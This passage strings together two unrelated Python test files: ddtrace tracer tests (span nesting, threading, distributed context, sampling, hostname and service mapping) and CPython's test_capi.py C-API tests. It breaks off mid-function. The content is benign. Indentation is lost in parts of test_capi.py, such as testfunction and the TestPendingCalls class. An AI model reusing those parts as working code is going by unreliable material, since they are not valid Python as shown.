        with t.trace("1"):
            pass
    t.shutdown()
def test_ctx():
    """Nested traces keep current span / root span / call context correct
    at every level, finish as one trace, and sampling priority and origin
    are only recorded on the root span."""
    tracer = ddtrace.Tracer()
    tracer.writer = DummyWriter()

    with tracer.trace("test") as s1:
        assert tracer.current_span() == s1
        assert tracer.current_root_span() == s1
        assert tracer.get_call_context().trace_id == s1.trace_id
        assert tracer.get_call_context().span_id == s1.span_id

        with tracer.trace("test2") as s2:
            assert tracer.current_span() == s2
            assert tracer.current_root_span() == s1
            assert tracer.get_call_context().trace_id == s1.trace_id
            assert tracer.get_call_context().span_id == s2.span_id

            with tracer.trace("test3") as s3:
                assert tracer.current_span() == s3
                assert tracer.current_root_span() == s1
                assert tracer.get_call_context().trace_id == s1.trace_id
                assert tracer.get_call_context().span_id == s3.span_id

            # After s3 closes the context points back at s2.
            assert tracer.get_call_context().trace_id == s1.trace_id
            assert tracer.get_call_context().span_id == s2.span_id

        with tracer.trace("test4") as s4:
            assert tracer.current_span() == s4
            assert tracer.current_root_span() == s1
            assert tracer.get_call_context().trace_id == s1.trace_id
            assert tracer.get_call_context().span_id == s4.span_id

        assert tracer.current_span() == s1
        assert tracer.current_root_span() == s1

    assert tracer.current_span() is None
    assert tracer.current_root_span() is None
    assert s1.parent_id is None
    assert s2.parent_id == s1.span_id
    assert s3.parent_id == s2.span_id
    assert s4.parent_id == s1.span_id
    assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
    # Sampling priority / origin live on the root span only.
    assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
    assert SAMPLING_PRIORITY_KEY not in s2.metrics
    assert ORIGIN_KEY not in s1.meta

    t = tracer.writer.pop_traces()
    assert len(t) == 1
    assert len(t[0]) == 4
    _s1, _s2, _s3, _s4 = t[0]
    assert s1 == _s1
    assert s2 == _s2
    assert s3 == _s3
    assert s4 == _s4

    # A new root span after the trace finished starts a new trace id.
    with tracer.trace("s") as s:
        assert s.parent_id is None
        assert s.trace_id != s1.trace_id
def test_multithreaded():
    """Concurrent threads each produce an independent three-span trace;
    contexts must not leak across threads."""
    tracer = ddtrace.Tracer()
    tracer.writer = DummyWriter()

    def target():
        with tracer.trace("s1"):
            with tracer.trace("s2"):
                pass
            with tracer.trace("s3"):
                pass

    for i in range(1000):
        ts = [threading.Thread(target=target) for _ in range(10)]
        for t in ts:
            t.start()
        for t in ts:
            t.join()

        traces = tracer.writer.pop_traces()
        assert len(traces) == 10

        for trace in traces:
            assert len(trace) == 3
def test_ctx_distributed():
    """Activating a distributed Context controls the parenting, sampling
    priority and origin of subsequently started traces."""
    tracer = ddtrace.Tracer()
    tracer.writer = DummyWriter()
    # Test activating an invalid context.
    ctx = Context(span_id=None, trace_id=None)
    tracer.context_provider.activate(ctx)
    assert tracer.current_span() is None
    with tracer.trace("test") as s1:
        assert tracer.current_span() == s1
        assert tracer.current_root_span() == s1
        assert tracer.get_call_context().trace_id == s1.trace_id
        assert tracer.get_call_context().span_id == s1.span_id
        # An empty context must not become the parent of the new trace.
        assert s1.parent_id is None
    trace = tracer.writer.pop_traces()
    assert len(trace) == 1
    # Test activating a valid context.
    ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
    tracer.context_provider.activate(ctx)
    assert tracer.current_span() is None
    with tracer.trace("test2") as s2:
        assert tracer.current_span() == s2
        assert tracer.current_root_span() == s2
        # The distributed trace id is adopted by the local root span.
        assert tracer.get_call_context().trace_id == s2.trace_id == 4321
        assert tracer.get_call_context().span_id == s2.span_id
        # The remote span becomes the parent of the local root span.
        assert s2.parent_id == 1234
    trace = tracer.writer.pop_traces()
    assert len(trace) == 1
    # Sampling priority and origin propagate from the distributed context.
    assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
    assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep():
    """Setting MANUAL_KEEP_KEY must force USER_KEEP sampling priority,
    whether it is set on the root span or on a child span."""
    tracer = Tracer()
    tracer.writer = DummyWriter()
    # On a root span
    with tracer.trace("asdf") as s:
        s.set_tag(MANUAL_KEEP_KEY)
    spans = tracer.writer.pop()
    # Compare with `==`, not `is`: identity on numbers relies on CPython's
    # small-int caching and breaks if the metric is stored as a float.
    assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == priority.USER_KEEP
    # On a child span
    with tracer.trace("asdf"):
        with tracer.trace("child") as s:
            s.set_tag(MANUAL_KEEP_KEY)
    spans = tracer.writer.pop()
    assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == priority.USER_KEEP
def test_manual_keep_then_drop():
    """The last manual sampling decision made before the trace finishes wins:
    a child's MANUAL_KEEP is overridden by the root's later MANUAL_DROP."""
    tracer = Tracer()
    tracer.writer = DummyWriter()
    # Test changing the value before finish.
    with tracer.trace("asdf") as root:
        with tracer.trace("child") as child:
            child.set_tag(MANUAL_KEEP_KEY)
        root.set_tag(MANUAL_DROP_KEY)
    spans = tracer.writer.pop()
    # Compare with `==`, not `is`: identity on numbers relies on CPython's
    # small-int caching and breaks if the metric is stored as a float.
    assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == priority.USER_REJECT
def test_manual_drop():
    """Setting MANUAL_DROP_KEY must force USER_REJECT sampling priority,
    whether it is set on the root span or on a child span."""
    tracer = Tracer()
    tracer.writer = DummyWriter()
    # On a root span
    with tracer.trace("asdf") as s:
        s.set_tag(MANUAL_DROP_KEY)
    spans = tracer.writer.pop()
    # Compare with `==`, not `is`: identity on numbers relies on CPython's
    # small-int caching and breaks if the metric is stored as a float.
    assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == priority.USER_REJECT
    # On a child span
    with tracer.trace("asdf"):
        with tracer.trace("child") as s:
            s.set_tag(MANUAL_DROP_KEY)
    spans = tracer.writer.pop()
    assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname):
    """With report_hostname enabled, only the root span carries the tag."""
    get_hostname.return_value = "test-hostname"
    tracer = Tracer()
    tracer.writer = DummyWriter()
    with override_global_config(dict(report_hostname=True)):
        with tracer.trace("span"):
            with tracer.trace("child"):
                pass
    finished = tracer.writer.pop()
    root, child = finished[0], finished[1]
    # The hostname is reported once, on the root span only.
    assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
    assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname):
    """With report_hostname disabled, no span carries the hostname tag."""
    get_hostname.return_value = "test-hostname"
    tracer = Tracer()
    tracer.writer = DummyWriter()
    with override_global_config(dict(report_hostname=False)):
        with tracer.trace("span"):
            with tracer.trace("child"):
                pass
    finished = tracer.writer.pop()
    root, child = finished[0], finished[1]
    # Neither root nor child should be tagged.
    assert root.get_tag(HOSTNAME_KEY) is None
    assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname):
    """The hostname tag must be absent under the default configuration."""
    # NOTE(review): this overrides report_hostname=False explicitly, which
    # makes it identical to test_get_report_hostname_disabled; overriding
    # with an empty dict() would exercise the actual default — confirm intent.
    get_hostname.return_value = "test-hostname"
    tracer = Tracer()
    tracer.writer = DummyWriter()
    with override_global_config(dict(report_hostname=False)):
        with tracer.trace("span"):
            with tracer.trace("child"):
                pass
    spans = tracer.writer.pop()
    root = spans[0]
    child = spans[1]
    assert root.get_tag(HOSTNAME_KEY) is None
    assert child.get_tag(HOSTNAME_KEY) is None
def test_service_mapping():
    """DD_SERVICE_MAPPING renames span services; when the same source service
    is mapped twice the last entry wins, and malformed entries are ignored."""
    @contextlib.contextmanager
    def override_service_mapping(service_mapping):
        # Rebuild the global service mapping from the env var, then reset it.
        with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
            assert ddtrace.config.service_mapping == {}
            ddtrace.config.service_mapping = Config().service_mapping
            yield
            ddtrace.config.service_mapping = {}
    # Test single mapping
    with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
        assert span.service == "bar"
    # Test multiple mappings
    with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
        assert span.service == "fu"
    # Test colliding mappings
    with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
        assert span.service == "foobar"
    # Test invalid service mapping
    with override_service_mapping("foo;bar,sna:fu"):
        # "foo;bar" is malformed (no colon) so "foo" passes through unchanged,
        # while the well-formed "sna:fu" entry still applies.
        with ddtrace.Tracer().trace("passthru", service="foo") as _:
            assert _.service == "foo"
        with ddtrace.Tracer().trace("renaming", "sna") as _:
            assert _.service == "fu"
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
import importlib.machinery
import importlib.util
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
# _posixsubprocess is a POSIX-only accelerator module; tests that need it
# are individually guarded with skipUnless(_posixsubprocess, ...).
try:
    import _posixsubprocess
except ImportError:
    _posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
    # Expose plain callables through _testcapi.instancemethod so that
    # attribute access on an instance binds them like instance methods
    # (exercised by CAPITest.test_instancemethod below).
    id = _testcapi.instancemethod(id)
    testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
    """Regression tests driving assorted Python/C API entry points exported
    by the _testcapi extension module."""
    def test_instancemethod(self):
        """instancemethod wrappers bind through instances and share the
        wrapped function's docstring and attributes."""
        inst = InstanceMethod()
        self.assertEqual(id(inst), inst.id())
        self.assertTrue(inst.testfunction() is inst)
        self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
        self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
        InstanceMethod.testfunction.attribute = "test"
        self.assertEqual(testfunction.attribute, "test")
        self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
    def test_no_FatalError_infinite_loop(self):
        """A fatal error raised with no current thread state must abort the
        subprocess with a diagnostic instead of looping forever."""
        with support.SuppressCrashReport():
            p = subprocess.Popen([sys.executable, "-c",
                                  'import _testcapi;'
                                  '_testcapi.crash_no_current_thread()'],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            (out, err) = p.communicate()
        self.assertEqual(out, b'')
        # This used to cause an infinite loop.
        self.assertTrue(err.rstrip().startswith(
                         b'Fatal Python error: '
                         b'PyThreadState_Get: '
                         b'the function must be called with the GIL held, '
                         b'but the GIL is released '
                         b'(the current Python thread state is NULL)'),
                        err)
    def test_memoryview_from_NULL_pointer(self):
        """Creating a memoryview over a NULL pointer must raise ValueError."""
        self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
    def test_exc_info(self):
        """_testcapi.set_exc_info must swap the thread's exception state and
        hand back the previous one so it can be restored."""
        raised_exception = ValueError("5")
        new_exc = TypeError("TEST")
        try:
            raise raised_exception
        except ValueError as e:
            tb = e.__traceback__
            orig_sys_exc_info = sys.exc_info()
            orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
            new_sys_exc_info = sys.exc_info()
            new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
            reset_sys_exc_info = sys.exc_info()
            self.assertEqual(orig_exc_info[1], e)
            self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
            self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
            self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
        else:
            # The raise above must have been taken; reaching here is a bug.
            self.assertTrue(False)
    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_seq_bytes_to_charp_array(self):
        # Issue #15732: crash in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return 1
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
        # Issue #15736: overflow in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return sys.maxsize
            def __getitem__(self, i):
                return b'x'
        self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_subprocess_fork_exec(self):
        class Z(object):
            def __len__(self):
                return 1
        # Issue #15738: crash in subprocess_fork_exec()
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
    @unittest.skipIf(MISSING_C_DOCSTRINGS,
                     "Signature information for builtins requires docstrings")
    def test_docstring_signature_parsing(self):
        """__doc__/__text_signature__ extraction from C-level docstrings,
        including malformed signature blocks."""
        self.assertEqual(_testcapi.no_docstring.__doc__, None)
        self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_empty.__doc__, None)
        self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_no_signature.__doc__,
            "This docstring has no signature.")
        self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
            "docstring_with_invalid_signature($module, /, boo)\n"
            "\n"
            "This docstring has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
            "docstring_with_invalid_signature2($module, /, boo)\n"
            "\n"
            "--\n"
            "\n"
            "This docstring also has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_with_signature.__doc__,
            "This docstring has a valid signature.")
        self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
            "($module, /, sig)")
        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
            "\nThis docstring has a valid signature and some extra newlines.")
        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
            "($module, /, parameter)")
    def test_c_type_with_matrix_multiplication(self):
        """A C type can implement the @ and @= operators."""
        M = _testcapi.matmulType
        m1 = M()
        m2 = M()
        self.assertEqual(m1 @ m2, ("matmul", m1, m2))
        self.assertEqual(m1 @ 42, ("matmul", m1, 42))
        self.assertEqual(42 @ m1, ("matmul", 42, m1))
        o = m1
        o @= m2
        self.assertEqual(o, ("imatmul", m1, m2))
        o = m1
        o @= 42
        self.assertEqual(o, ("imatmul", m1, 42))
        o = 42
        # int has no @=, so this falls back to the right operand's matmul.
        o @= m1
        self.assertEqual(o, ("matmul", 42, m1))
    def test_c_type_with_ipow(self):
        # When the __ipow__ method of a type was implemented in C, using the
        # modulo param would cause segfaults.
        o = _testcapi.ipowType()
        self.assertEqual(o.__ipow__(1), (1, None))
        self.assertEqual(o.__ipow__(2, 2), (2, 2))
    def test_return_null_without_error(self):
        # Issue #23571: A function must not return NULL without setting an
        # error
        if Py_DEBUG:
            # A debug build turns this into a fatal error; check it in a
            # subprocess so the test runner survives.
            code = textwrap.dedent("""
                import _testcapi
                from test import support

                with support.SuppressCrashReport():
                    _testcapi.return_null_without_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            self.assertRegex(err.replace(b'\r', b''),
                             br'Fatal Python error: _Py_CheckFunctionResult: '
                                br'a function returned NULL '
                                br'without setting an error\n'
                             br'Python runtime state: initialized\n'
                             br'SystemError: <built-in function '
                                 br'return_null_without_error> returned NULL '
                                 br'without setting an error\n'
                             br'\n'
                             br'Current thread.*:\n'
                             br'  File .*", line 6 in <module>')
        else:
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_null_without_error()
            self.assertRegex(str(cm.exception),
                             'return_null_without_error.* '
                             'returned NULL without setting an error')
    def test_return_result_with_error(self):
        # Issue #23571: A function must not return a result with an error set
        if Py_DEBUG:
            # Same pattern: fatal error in a debug build, SystemError otherwise.
            code = textwrap.dedent("""
                import _testcapi
                from test import support

                with support.SuppressCrashReport():
                    _testcapi.return_result_with_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            self.assertRegex(err.replace(b'\r', b''),
                             br'Fatal Python error: _Py_CheckFunctionResult: '
                                 br'a function returned a result '
                                 br'with an error set\n'
                             br'Python runtime state: initialized\n'
                             br'ValueError\n'
                             br'\n'
                             br'The above exception was the direct cause '
                                br'of the following exception:\n'
                             br'\n'
                             br'SystemError: <built-in '
                                br'function return_result_with_error> '
                                br'returned a result with an error set\n'
                             br'\n'
                             br'Current thread.*:\n'
                             br'  File .*, line 6 in <module>')
        else:
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_result_with_error()
            self.assertRegex(str(cm.exception),
                             'return_result_with_error.* '
                             'returned a result with an error set')
    def test_buildvalue_N(self):
        """Run the C-side checks for Py_BuildValue's 'N' format unit."""
        _testcapi.test_buildvalue_N()
    def test_set_nomemory(self):
        """set_nomemory()/remove_mem_hooks() make allocations fail on demand;
        the expected MemoryError indices are printed by the subprocess."""
        code = """if 1:
            import _testcapi
            class C(): pass

            # The first loop tests both functions and that remove_mem_hooks()
            # can be called twice in a row. The second loop checks a call to
            # set_nomemory() after a call to remove_mem_hooks(). The third
            # loop checks the start and stop arguments of set_nomemory().
            for outer_cnt in range(1, 4):
                start = 10 * outer_cnt
                for j in range(100):
                    if j == 0:
                        if outer_cnt != 3:
                            _testcapi.set_nomemory(start)
                        else:
                            _testcapi.set_nomemory(start, start + 1)
                    try:
                        C()
                    except MemoryError as e:
                        if outer_cnt != 3:
                            _testcapi.remove_mem_hooks()
                        print('MemoryError', outer_cnt, j)
                        _testcapi.remove_mem_hooks()
                        break
        """
        rc, out, err = assert_python_ok('-c', code)
        self.assertIn(b'MemoryError 1 10', out)
        self.assertIn(b'MemoryError 2 20', out)
        self.assertIn(b'MemoryError 3 30', out)
    def test_mapping_keys_values_items(self):
        """PyMapping_Keys/Values/Items must honour overridden keys()/values()/
        items() methods and always return lists."""
        class Mapping1(dict):
            def keys(self):
                return list(super().keys())
            def values(self):
                return list(super().values())
            def items(self):
                return list(super().items())
        class Mapping2(dict):
            def keys(self):
                return tuple(super().keys())
            def values(self):
                return tuple(super().values())
            def items(self):
                return tuple(super().items())
        dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
        for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
                        dict_obj, OrderedDict(dict_obj),
                        Mapping1(dict_obj), Mapping2(dict_obj)]:
            self.assertListEqual(_testcapi.get_mapping_keys(mapping),
                                 list(mapping.keys()))
            self.assertListEqual(_testcapi.get_mapping_values(mapping),
                                 list(mapping.values()))
            self.assertListEqual(_testcapi.get_mapping_items(mapping),
                                 list(mapping.items()))
    def test_mapping_keys_values_items_bad_arg(self):
        """Non-mappings and mappings whose accessors return non-sequences
        must raise AttributeError / TypeError respectively."""
        self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
        self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
        self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
        class BadMapping:
            def keys(self):
                return None
            def values(self):
                return None
            def items(self):
                return None
        bad_mapping = BadMapping()
        self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
        self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
        self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
    @unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
                         'need _testcapi.negative_refcount')
    def test_negative_refcount(self):
        # bpo-35059: Check that Py_DECREF() reports the correct filename
        # when calling _Py_NegativeRefcount() to abort Python.
        code = textwrap.dedent("""
            import _testcapi
            from test import support

            with support.SuppressCrashReport():
                _testcapi.negative_refcount()
        """)
        rc, out, err = assert_python_failure('-c', code)
        self.assertRegex(err,
                         br'_testcapimodule\.c:[0-9]+: '
                         br'_Py_NegativeRefcount: Assertion failed: '
                         br'object has negative ref count')
    def test_trashcan_subclass(self):
        # bpo-35983: Check that the trashcan mechanism for "list" is NOT
        # activated when its tp_dealloc is being called by a subclass
        from _testcapi import MyList
        L = None
        for i in range(1000):
            L = MyList((L,))
    @support.requires_resource('cpu')
    def test_trashcan_python_class1(self):
        self.do_test_trashcan_python_class(list)
    @support.requires_resource('cpu')
    def test_trashcan_python_class2(self):
        from _testcapi import MyList
        self.do_test_trashcan_python_class(MyList)
    def do_test_trashcan_python_class(self, base):
        # Check that the trashcan mechanism works properly for a Python
        # subclass of a class using the trashcan (this specific test assumes
        # that the base class "base" behaves like list)
        class PyList(base):
            # Count the number of PyList instances to verify that there is
            # no memory leak
            num = 0
            def __init__(self, *args):
                __class__.num += 1
                super().__init__(*args)
            def __del__(self):
                __class__.num -= 1
        for parity in (0, 1):
            L = None
            # We need in the order of 2**20 iterations here such that a
            # typical 8MB stack would overflow without the trashcan.
            for i in range(2**20):
                L = PyList((L,))
                L.attr = i
            if parity:
                # Add one additional nesting layer
                L = (L,)
            self.assertGreater(PyList.num, 0)
            del L
            self.assertEqual(PyList.num, 0)
    def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
        """Deallocating a Python subclass of a GC heap C type must decref
        the type exactly once."""
        class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
            def __init__(self):
                self.value2 = 20
                super().__init__()
        subclass_instance = HeapGcCTypeSubclass()
        type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
        # Test that subclass instance was fully created
        self.assertEqual(subclass_instance.value, 10)
        self.assertEqual(subclass_instance.value2, 20)
        # Test that the type reference count is only decremented once
        del subclass_instance
        self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
    def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
        """__del__ reassigning __class__ must keep type refcounts balanced."""
        class A(_testcapi.HeapGcCType):
            def __init__(self):
                self.value2 = 20
                super().__init__()
        class B(A):
            def __init__(self):
                super().__init__()
            def __del__(self):
                self.__class__ = A
                A.refcnt_in_del = sys.getrefcount(A)
                B.refcnt_in_del = sys.getrefcount(B)
        subclass_instance = B()
        type_refcnt = sys.getrefcount(B)
        new_type_refcnt = sys.getrefcount(A)
        # Test that subclass instance was fully created
        self.assertEqual(subclass_instance.value, 10)
        self.assertEqual(subclass_instance.value2, 20)
        del subclass_instance
        # Test that setting __class__ modified the reference counts of the types
        self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
        self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
        # Test that the original type already has decreased its refcnt
        self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
        # Test that subtype_dealloc decref the newly assigned __class__ only once
        self.assertEqual(new_type_refcnt, sys.getrefcount(A))
    def test_heaptype_with_dict(self):
        """A heap C type with a tp_dictoffset supports instance attributes."""
        inst = _testcapi.HeapCTypeWithDict()
        inst.foo = 42
        self.assertEqual(inst.foo, 42)
        self.assertEqual(inst.dictobj, inst.__dict__)
        self.assertEqual(inst.dictobj, {"foo": 42})
        inst = _testcapi.HeapCTypeWithDict()
        self.assertEqual({}, inst.__dict__)
    def test_heaptype_with_negative_dict(self):
        """Same as above but with a negative (end-relative) dict offset."""
        inst = _testcapi.HeapCTypeWithNegativeDict()
        inst.foo = 42
        self.assertEqual(inst.foo, 42)
        self.assertEqual(inst.dictobj, inst.__dict__)
        self.assertEqual(inst.dictobj, {"foo": 42})
        inst = _testcapi.HeapCTypeWithNegativeDict()
        self.assertEqual({}, inst.__dict__)
    def test_heaptype_with_weakref(self):
        """A heap C type with a weakref slot can be weakly referenced."""
        inst = _testcapi.HeapCTypeWithWeakref()
        ref = weakref.ref(inst)
        self.assertEqual(ref(), inst)
        self.assertEqual(inst.weakreflist, ref)
    def test_heaptype_with_buffer(self):
        """A heap C type exposing the buffer protocol converts to bytes."""
        inst = _testcapi.HeapCTypeWithBuffer()
        b = bytes(inst)
        self.assertEqual(b, b"1234")
    def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
        """Deallocating a C-level subclass of a heap C type must decref the
        type exactly once."""
        subclass_instance = _testcapi.HeapCTypeSubclass()
        type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
        # Test that subclass instance was fully created
        self.assertEqual(subclass_instance.value, 10)
        self.assertEqual(subclass_instance.value2, 20)
        # Test that the type reference count is only decremented once
        del subclass_instance
        self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
    def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
        """A C-level finalizer reassigning __class__ must keep type refcounts
        balanced (mirror of the Python-level test above)."""
        subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
        type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
        new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
        # Test that subclass instance was fully created
        self.assertEqual(subclass_instance.value, 10)
        self.assertEqual(subclass_instance.value2, 20)
        # The tp_finalize slot will set __class__ to HeapCTypeSubclass
        del subclass_instance
        # Test that setting __class__ modified the reference counts of the types
        self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
        self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
        # Test that the original type already has decreased its refcnt
        self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
        # Test that subtype_dealloc decref the newly assigned __class__ only once
        self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
    def test_heaptype_with_setattro(self):
        """A heap C type with a custom tp_setattro sees sets and deletes."""
        obj = _testcapi.HeapCTypeSetattr()
        self.assertEqual(obj.pvalue, 10)
        obj.value = 12
        self.assertEqual(obj.pvalue, 12)
        del obj.value
        # Deleting the attribute resets pvalue to 0 rather than raising.
        self.assertEqual(obj.pvalue, 0)
    def test_pynumber_tobase(self):
        """PyNumber_ToBase formats ints in bases 2/8/10/16 and rejects
        non-ints and unsupported bases."""
        from _testcapi import pynumber_tobase
        self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
        self.assertEqual(pynumber_tobase(123, 8), '0o173')
        self.assertEqual(pynumber_tobase(123, 10), '123')
        self.assertEqual(pynumber_tobase(123, 16), '0x7b')
        self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
        self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
        self.assertEqual(pynumber_tobase(-123, 10), '-123')
        self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
        self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
        self.assertRaises(TypeError, pynumber_tobase, '123', 10)
        self.assertRaises(SystemError, pynumber_tobase, 123, 0)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
    """Behaviour of code executed in a subinterpreter via
    support.run_in_subinterp; results come back over an os.pipe()."""
    def test_subinterps(self):
        """A subinterpreter gets its own sys.modules and builtins objects."""
        import builtins
        r, w = os.pipe()
        code = """if 1:
